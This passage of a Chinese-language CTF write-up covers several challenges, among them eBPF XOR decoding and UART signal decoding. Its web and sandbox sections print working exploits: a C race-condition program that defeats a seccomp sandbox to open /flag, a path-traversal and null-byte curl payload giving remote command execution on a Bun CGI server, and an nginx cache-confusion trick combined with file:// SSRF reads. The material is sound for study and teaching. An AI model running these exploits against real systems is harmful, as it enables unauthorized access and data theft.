     406:       bf 25 00 00 00 00 00 00 r5 = r2
     407:       07 05 00 00 60 00 00 00 r5 += 0x60
     408:       2d 35 4b 00 00 00 00 00 if r5 > r3 goto +0x4b <LBB0_71>
     409:       71 24 5f 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5f)
     410:       a7 04 00 00 c5 00 00 00 r4 ^= 0xc5
     411:       73 4a f1 ff 00 00 00 00 *(u8 *)(r10 - 0xf) = w4
     412:       b7 04 00 00 36 00 00 00 r4 = 0x36
     413:       bf 25 00 00 00 00 00 00 r5 = r2
     414:       07 05 00 00 61 00 00 00 r5 += 0x61
     415:       2d 35 44 00 00 00 00 00 if r5 > r3 goto +0x44 <LBB0_71>
     416:       71 24 60 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x60)
     417:       a7 04 00 00 af 00 00 00 r4 ^= 0xaf
     418:       73 4a f2 ff 00 00 00 00 *(u8 *)(r10 - 0xe) = w4
     419:       b7 04 00 00 37 00 00 00 r4 = 0x37
     420:       bf 25 00 00 00 00 00 00 r5 = r2
     421:       07 05 00 00 62 00 00 00 r5 += 0x62
     422:       2d 35 3d 00 00 00 00 00 if r5 > r3 goto +0x3d <LBB0_71>
     423:       71 24 61 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x61)
     424:       a7 04 00 00 39 00 00 00 r4 ^= 0x39
     425:       73 4a f3 ff 00 00 00 00 *(u8 *)(r10 - 0xd) = w4
     426:       b7 04 00 00 38 00 00 00 r4 = 0x38
     427:       bf 25 00 00 00 00 00 00 r5 = r2
     428:       07 05 00 00 63 00 00 00 r5 += 0x63
     429:       2d 35 36 00 00 00 00 00 if r5 > r3 goto +0x36 <LBB0_71>
     430:       71 24 62 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x62)
     431:       a7 04 00 00 09 00 00 00 r4 ^= 0x9
     432:       73 4a f4 ff 00 00 00 00 *(u8 *)(r10 - 0xc) = w4
     433:       b7 04 00 00 39 00 00 00 r4 = 0x39
     434:       bf 25 00 00 00 00 00 00 r5 = r2
     435:       07 05 00 00 64 00 00 00 r5 += 0x64
     436:       2d 35 2f 00 00 00 00 00 if r5 > r3 goto +0x2f <LBB0_71>
     437:       71 24 63 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x63)
     438:       a7 04 00 00 ca 00 00 00 r4 ^= 0xca
     439:       73 4a f5 ff 00 00 00 00 *(u8 *)(r10 - 0xb) = w4
     440:       b7 04 00 00 3a 00 00 00 r4 = 0x3a
     441:       bf 25 00 00 00 00 00 00 r5 = r2
     442:       07 05 00 00 65 00 00 00 r5 += 0x65
     443:       2d 35 28 00 00 00 00 00 if r5 > r3 goto +0x28 <LBB0_71>
     444:       71 24 64 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x64)
     445:       a7 04 00 00 ae 00 00 00 r4 ^= 0xae
     446:       73 4a f6 ff 00 00 00 00 *(u8 *)(r10 - 0xa) = w4
     447:       b7 04 00 00 3b 00 00 00 r4 = 0x3b
     448:       bf 25 00 00 00 00 00 00 r5 = r2
     449:       07 05 00 00 66 00 00 00 r5 += 0x66
     450:       2d 35 21 00 00 00 00 00 if r5 > r3 goto +0x21 <LBB0_71>
     451:       71 24 65 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x65)
     452:       a7 04 00 00 ec 00 00 00 r4 ^= 0xec
     453:       73 4a f7 ff 00 00 00 00 *(u8 *)(r10 - 0x9) = w4
     454:       b7 04 00 00 3c 00 00 00 r4 = 0x3c
     455:       bf 25 00 00 00 00 00 00 r5 = r2
     456:       07 05 00 00 67 00 00 00 r5 += 0x67
     457:       2d 35 1a 00 00 00 00 00 if r5 > r3 goto +0x1a <LBB0_71>
     458:       71 24 66 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x66)
     459:       a7 04 00 00 1d 00 00 00 r4 ^= 0x1d
     460:       73 4a f8 ff 00 00 00 00 *(u8 *)(r10 - 0x8) = w4
     461:       b7 04 00 00 3d 00 00 00 r4 = 0x3d
     462:       bf 25 00 00 00 00 00 00 r5 = r2
     463:       07 05 00 00 68 00 00 00 r5 += 0x68
     464:       2d 35 13 00 00 00 00 00 if r5 > r3 goto +0x13 <LBB0_71>
     465:       71 24 67 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x67)
     466:       a7 04 00 00 cf 00 00 00 r4 ^= 0xcf
     467:       73 4a f9 ff 00 00 00 00 *(u8 *)(r10 - 0x7) = w4
     468:       b7 04 00 00 3e 00 00 00 r4 = 0x3e
     469:       bf 25 00 00 00 00 00 00 r5 = r2
     470:       07 05 00 00 69 00 00 00 r5 += 0x69
     471:       2d 35 0c 00 00 00 00 00 if r5 > r3 goto +0xc <LBB0_71>
     472:       71 24 68 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x68)
     473:       a7 04 00 00 e0 00 00 00 r4 ^= 0xe0
     474:       73 4a fa ff 00 00 00 00 *(u8 *)(r10 - 0x6) = w4
     475:       b7 04 00 00 3f 00 00 00 r4 = 0x3f
     476:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
     477:       bf 25 00 00 00 00 00 00 r5 = r2
     478:       07 05 00 00 6a 00 00 00 r5 += 0x6a
     479:       2d 35 04 00 00 00 00 00 if r5 > r3 goto +0x4 <LBB0_71>
     480:       71 22 69 00 00 00 00 00 w2 = *(u8 *)(r2 + 0x69)
     481:       a7 02 00 00 0a 00 00 00 r2 ^= 0xa
     482:       73 2a fb ff 00 00 00 00 *(u8 *)(r10 - 0x5) = w2
     483:       b7 04 00 00 40 00 00 00 r4 = 0x40

0000000000000f20 <LBB0_71>:
     484:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
     485:       bf a4 00 00 00 00 00 00 r4 = r10
     486:       07 04 00 00 b8 ff ff ff r4 += -0x48
     487:       18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 r2 = 0x0 ll
     489:       18 03 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 r3 = 0xffffffff ll
     491:       b7 05 00 00 44 00 00 00 r5 = 0x44
     492:       85 00 00 00 19 00 00 00 call 0x19
     493:       b7 00 00 00 01 00 00 00 r0 = 0x1

0000000000000f70 <LBB0_72>:
     494:       95 00 00 00 00 00 00 00 exit

我們會發現他是對每一個字元用不同的 secret key 去做加密，所以我們只要找到 asm 內有做 XOR 的 key 並蒐集到 32 個bytes 即可
exp:

enc_hex = "eabbc25677f3084458f0531f86863f226c95d555e6c28bd7"
ciphertext = bytes.fromhex(enc_hex)

keys = [
    0xaf, 0xf4, 0x84, 0x2d, 0x04, 0x9a, 0x39, 0x0f,
    0x2b, 0xc0, 0x1d, 0x78, 0xd9, 0xb7, 0x0a, 0x7d,
    0x0b, 0xa5, 0xba, 0x11, 0xb9, 0x96, 0xbb, 0xaa
]

flag = "".join(chr(ciphertext[i] ^ keys[i]) for i in range(len(ciphertext)))

print(f"Flag: {flag}")

flag: EOF{si1Ks0Ng_15_g0oD_T0}

SaaS

seccomp-sandbox.c:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <stddef.h>
#include <seccomp.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ptrace.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <linux/limits.h>
#include <linux/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/audit.h>

int is_open_file_nr(int nr) {
    return (
        nr == __NR_open || nr ==  __NR_openat || nr == __NR_openat2 ||
        nr == __NR_link || nr == __NR_linkat ||
        nr == __NR_symlink || nr == __NR_symlinkat ||
        nr == __NR_mount || nr == __NR_name_to_handle_at
    );
}

int path_index(int nr) {
    switch (nr) {
        case __NR_open:
            return 0;
        case __NR_openat:
            return 1;
        case __NR_openat2:
            return 1;
        case __NR_link:
            return 0;
        case __NR_linkat:
            return 1;
        case __NR_symlink:
            return 0;
        case __NR_symlinkat:
            return 1;
        case __NR_mount:
            return 0;
        case __NR_name_to_handle_at:
            return 1;
        default:
            return -1;
    }
}

int notif_handler(struct seccomp_notif *req, struct seccomp_notif_resp *resp, int fd) {
    int ret, memfd;
    char memfile[PATH_MAX];
    char open_path[PATH_MAX];
    char real_path[PATH_MAX];

    resp->id = req->id;
    resp->error = 0;
    resp->val = 0;

    int nr = req->data.nr;

    ret = seccomp_notify_id_valid(fd, req->id);
    if (ret < 0) {
        goto out;
    }

    if (is_open_file_nr(nr)) {
        int index = path_index(nr);

        struct iovec local[1];
        struct iovec remote[1];
        local[0].iov_base = open_path;
        local[0].iov_len = sizeof(open_path);
        remote[0].iov_base = (void *) req->data.args[1];
        remote[0].iov_len = sizeof(open_path);

        if (process_vm_readv(req->pid, local, 1, remote, 1, 0) < 0) {
            resp->error = -EPERM;
            resp->val = -8;
            goto out;
        }

        realpath(open_path, real_path);

        if (strcmp(real_path, "/flag") == 0) {
            fprintf(stderr, "[sandbox] blocked open /flag\n");

            resp->error = -EPERM;
            resp->val = -8;
            goto out;
        }

        goto cont;
    } else if (nr == __NR_getpid) {
        resp->val = 48763;
    } else {
cont:
        resp->flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE;
    }

    ret = 0;

out:
    close(memfd);
    return ret;
}

int init_seccomp() {
    int ret;
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);

    // send_fd
    // ret = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sendmsg), 0);
    // ret = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fcntl), 0);

    // stdin, stdout, stderr
    // ret = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 1, SCMP_CMP(0, SCMP_CMP_LE, 2));
    // ret = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 1, SCMP_CMP(0, SCMP_CMP_LE, 2));

    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(openat), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(openat2), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(link), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(linkat), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(symlink), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(symlinkat), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(mount), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(name_to_handle_at), 0);
    seccomp_rule_add(ctx, SCMP_ACT_NOTIFY, SCMP_SYS(getpid), 0);
    seccomp_load(ctx);

    ret = seccomp_notify_fd(ctx);
    if (ret < 0) {
        errno = -ret;
        return -1;
    }

    // set blocking
    int flags = fcntl(ret, F_GETFL);
    flags &= ~O_NONBLOCK;

    fcntl(ret, F_SETFL, flags);

    return ret;
}

static int pidfd_open(pid_t pid, unsigned int flags) {
    return syscall(SYS_pidfd_open, pid, flags);
}

static int pidfd_getfd(int pidfd, int targetfd, unsigned int flags) {
    return syscall(SYS_pidfd_getfd, pidfd, targetfd, flags);
}

static int seccomp_notify_zeroing(
    struct seccomp_notif *req,
    struct seccomp_notif_resp *resp
) {
    int rc;
    static struct seccomp_notif_sizes sizes = { 0, 0, 0 };

    if (sizes.seccomp_notif == 0 && sizes.seccomp_notif_resp == 0) {
        rc = syscall(__NR_seccomp, SECCOMP_GET_NOTIF_SIZES, 0, &sizes);
        if (rc < 0) return rc;
    }
    // no size
    if (sizes.seccomp_notif == 0 || sizes.seccomp_notif_resp == 0)
        return -EFAULT;

    if (req) memset(req, 0, sizes.seccomp_notif);
    if (resp) memset(resp, 0, sizes.seccomp_notif_resp);

    return 0;
}

void run_program(char* program) {
    char *argv[2];
    argv[0] = program;
    argv[1] = NULL;

    if (access(program, X_OK) != 0) {
        fprintf(stderr, "program not found or not executable\n");
        exit(127);
    }

    execve(program, argv, __environ);
}

int main(int argc, char **argv) {
    int status = -1;
    int *targetfd = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    *targetfd = -1;

    char *program;
    if (argc > 1) {
        program = argv[1];
    } else {
        program = "app";
    }

    int pid = fork();

    if (pid == 0) {
        // no new priveleges to enable filter without root
        prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);

        int notifier = init_seccomp();
        *targetfd = notifier;

        // busy waiting, keep fd valid until parent receive it
        while (*targetfd != -1);
        close(notifier);

        run_program(program);

        // should not reach here
        exit(127);
    } else if (pid < 0) {
        fprintf(stderr, "fork failed\n");
        goto close;
    } else {
        int pidfd = pidfd_open(pid, 0);

        // busy waiting
        while (*targetfd == -1);

        int notifier = pidfd_getfd(pidfd, *targetfd, 0);

        if (notifier < 0) {
            goto out_kill;
        }

        *targetfd = -1;
        munmap(targetfd, sizeof(int));

        int tracer = fork();

        if (tracer == 0) {
            struct seccomp_notif *req;
            struct seccomp_notif_resp *resp;

            seccomp_notify_alloc(&req, &resp);

            while (1) {
                seccomp_notify_zeroing(req, resp);
                int ret = seccomp_notify_receive(notifier, req);
                if (ret) break;

                if (notif_handler(req, resp, notifier) < 0) break;

                seccomp_notify_respond(notifier, resp);
            }
            seccomp_notify_free(req, resp);

            close(notifier);
            exit(1);
        }

        close(notifier);

        waitpid(pid, &status, 0);

out_kill:
        if (tracer > 0) kill(tracer, SIGKILL);
        if (pid > 0) kill(pid, SIGKILL);
    }

close:
    return status;
}

這裡會發現存在 TOCTOU 漏洞
這裡會導致 Kernel 必須重新回到使用者記憶體去讀取檔案路徑參數

所以我們可以透過 Sandbox 檢查完記憶體認為安全後，Kernel 真正執行時需同一塊記憶體，利用這微小的時間差將路徑偷換成 /flag

exp.c:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#define GOOD_PATH "/etc/passwd"
#define BAD_PATH  "/flag"

char *shared_path;
int stop = 0;

void* flipper(void* arg) {
    while (!stop) {
        strcpy(shared_path, GOOD_PATH);
        strcpy(shared_path, BAD_PATH);
    }
    return NULL;
}

int main() {
    shared_path = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);

    pthread_t t;
    pthread_create(&t, NULL, flipper, NULL);

    for (int i = 0; i < 10000; i++) {
        int fd = syscall(SYS_openat, AT_FDCWD, shared_path, O_RDONLY);

        if (fd >= 0) {
            char buf[128] = {0};
            read(fd, buf, sizeof(buf) - 1);
            if (strstr(buf, "EOF{") || buf[0] != 'r') {
                printf("\nFlag: %s\n", buf);
                stop = 1;
                close(fd);
                break;
            }
            close(fd);
        }

        if (i % 1000 == 0) printf(".");
        fflush(stdout);
    }

    stop = 1;
    pthread_join(t, NULL);
    return 0;
}

flag: EOF{TICTACTOE_TICKTOCTOU}

Reverse

Structured - Small

題目給了 10 個 binary 一個一個分析會發現每一個 binary 幾乎除了 v5 的值其他code 均相同, 但是會發現第 6 10 11 的 binary 是 flag 的開頭與結尾，裡面有做一些位移，所以我們要把 flag 的位移依照程式邏輯轉回來
exp.py:

import struct

def rol64(val, n):
    return ((val << n) & 0xFFFFFFFFFFFFFFFF) | (val >> (64 - n))

def pack_str(s):
    s_bytes = s.encode().ljust(8, b'\x00')
    return struct.unpack('>Q', s_bytes)[0]

def unpack_int(n, length=8):
    return struct.pack('>Q', n)[-length:].decode(errors='ignore')

v5_val = pack_str('TRuEOF{5')
part5 = unpack_int(rol64(v5_val, 24))

v9_val = pack_str('faNg_906')
part9 = unpack_int(rol64(v9_val, 16))

part11_const = b'\x0a\x7d\x38\x39\x66\x35\x34'
part11 = part11_const[::-1].decode()

flag_parts = [
    "EOF{5TRu",
    "CTuR3D_r",
    "3V3R53_3",
    "ng1N3eR1",
    part9,
    "c9195049",
    part11
]

print("".join(flag_parts).strip())

bored

a part of signal.vcd:

#833328   -> 訊號變 0
0d
#1041660  -> 訊號變 1 (差 208332)
1d
#1145826  -> 訊號變 0 (差 104166)
// 這裡可以發現 208332 正好是 104166 的兩倍，表示一個 bit 的時間長度 = 104166 ns
0d
#1458324
1d
#1666656
0d
#1770822
1d
#1979154
0d
#2291652
1d
#2395818
0d
......

所以可以做出以下表格統計

Bit 順序	時間點 (ns)	讀取值	說明
Start	833,328	0	起始位元，通訊開始
Bit 0	833,328 + 104,166 = 937,494	0	資料第 1 位
Bit 1	937,494 + 104,166 = 1,041,660	1	資料第 2 位（波形拉高）
Bit 2	1,041,660 + 104,166 = 1,145,826	0	資料第 3 位（波形拉低）
Bit 3	1,145,826 + 104,166 = 1,249,992	0	資料第 4 位
Bit 4	1,249,992 + 104,166 = 1,354,158	0	資料第 5 位
Bit 5	1,354,158 + 104,166 = 1,458,324	1	資料第 6 位（波形拉高）
Bit 6	1,458,324 + 104,166 = 1,562,490	1	資料第 7 位
Bit 7	1,562,490 + 104,166 = 1,666,656	0	資料第 8 位（波形拉低）
Stop	1,666,656 + 104,166 = 1,770,822	1	結束位元

現在我們收集到了 8 個資料位元： 0, 1, 0, 0, 0, 1, 1, 0

因為 UART 協定是 LSB First（最低有效位先傳），所以要把這個順序倒過來讀，才能變成人類看得懂的二進位數字：

原始順序： 0 1 0 0 0 1 1 0
倒轉順序 (MSB)： 0 1 1 0 0 0 1

將二進位 01100010 轉換成十六進位：

0110 = 6
0010 = 2
結果 = 0x62

0x62 = b

接著只要用同樣的邏輯（尋找下一個 Start Bit 0，然後每隔 104,166ns 讀一次）

依此類推，最終就會拼湊出key: b4r3MEt41

flag: EOF{ExP3d14i0N_33_15_4he_G0AT}

Web

Bun.PHP

這題是一個使用 bun v1.3.5 運行的 Server，不是傳統 nginx / Apache
Dockerfile: FROM oven/bun:1.3.5-alpine

我們可以從 index.js 發現
伺服器有一個路由 /cgi-bin/:filename，他限制我們請求的路徑只能以 .php 結尾，並且他是以 bun shell 的方式 $ 執行

雖然是 php 寫的，但是透過 Shebang #!/usr/bin/php-cgi 執行的
解決限制路徑的方式就是透過 path traversal 的方式 …%2f…%2f 來繞過
並且強制以 .php 結尾，我們可以透過 Null Byte injection (%00) 去截斷，這樣也確實是以 .php 結尾，但是又可以截斷 .php
這樣我們就可以嘗試執行 /bin/sh -> ..%2f..%2f..%2f..%2f..%2fbin%2fsh%00.php
於是我們可以使用 curl 送進我們的 payload，達成 RCE
final payload: curl -X POST "https://139b064eaa7c424a.chal.eof.133773.xyz:20001/cgi-bin/..%2f..%2f..%2f..%2fbin%2fsh%00.php" --data-binary $'printf "\r\n\r\n"; /readflag give me the flag'

flag: EOF{1_tUrn3d_Bun.PHP_Int0_4_r34l1ty}

LinkoReco

docker-compose.yml:

version: '3'
services:                                                                                               web:                                                                                                    image: nginx:latest
    ports:
      - "19080:80"                                                                                        volumes:                                                                                                - ./conf/default.conf:/etc/nginx/conf.d/default.conf
      - ./src:/var/www/html                                                                               depends_on:                                                                                             - php

  php:                                                                                                    image: php:7.4-fpm                                                                                    volumes:                                                                                                - ./src:/var/www/html
      - ./flag.txt:/etc/REDACTED_FILENAME.txt # yes, secret.

# static files should be well handled, but seems like only fpm serves it?

Hints:
1.

1	HINT: FULL ACCESS TOKEN CAN ONLY BE OBTAINED THROUGH LOCALHOST(web)

1. Token 只有在使用者從 local 造訪的時候會顯示
2. 這個服務沒有正確 Token 傳入的時候不會回顯內容，只會告訴你 status code，所以有 token 會更方便使用系統
3. 眼睛睜大一點，你會發現伺服器其實有在記得一些東西，而背景圖片本來應該要被存到的...但這個功能被 ai 寫壞了，/static 的靜態檔案應該要被存到的，但是他們直接走 nginx 跑掉了
4. 在她做滲透測試的時候沒有也不需要 fuzzing / 利用 SSRF 去戳 php fpm service

Cache Rule
map $request_uri $is_static {
    default 0;
    "~*^/static/.*\.(svg|png|jpg|jpeg|css)$" 1;
}

challenge page:

這一題我們要利用快取機制，來取得只有 localhost 才能拿到的 Token
再來需要利用拿到的 Token 去做驗證，在利用 SSRF 讀取 Server 內部的檔案

取得 Token 方法：

根據 Nginx 的 map 規則 "~*^/static/.*\.(svg|png|jpg|jpeg|css)$" 1; ，這表示如果網址以 /static/ 開頭且以圖片或 CSS 副檔名結尾，Nginx 會將其視為靜態資源並進行快取
但是 hint 裡有提到 /static 的檔案直接走 nginx，但因為「AI 寫壞了」，如果檔案不存在，通常 Nginx 的 try_files 機制會將請求轉給 index.php 處理
在 url 輸入欄填入：http://web/static/..%2findex.php/<anything>.png
然後使用payload:
curl -H "Host: web" --path-as-is http://chals1.eof.ais3.org:19080/static/..%2findex.php/flag.png
我們就可以拿到 Token 了

為啥可以這樣?
根據 Nginx 的判斷，Nginx 檢查網址字串：/static/..%2findex.php/flag.png
Nginx 裡面寫：只要是 /static/ 開頭且以 .png 結尾，就視為靜態檔案
結果就是: 這是一個靜態圖片，應該被快取
但當 Nginx 真的要去抓檔案的話，路徑就變成了 /static/../index.php/flag.png
/static/…/ 互相抵消，最終路徑指向 /index.php，後面的 /flag.png 變成 PATH_INFO，被 php 忽略了
執行結果：Nginx 將請求轉交給 PHP 執行 index.php

既然我們有了 Token ，我們可以去執行 Server 內的任意讀，利用 file://，但是我們會發現 docker-compose.yml，裡面把 flag.txt 命名成不知道是啥東東，所以我們可以利用 file:///proc/self/mounts 去找他裡面掛載了啥東東

發現 ca7_f113.txt
所以使用 file:///etc/ca7_f113.txt
get flag!

flag: EOF{たきな、スイーツ追加！それがないなら……修理？やらないから！}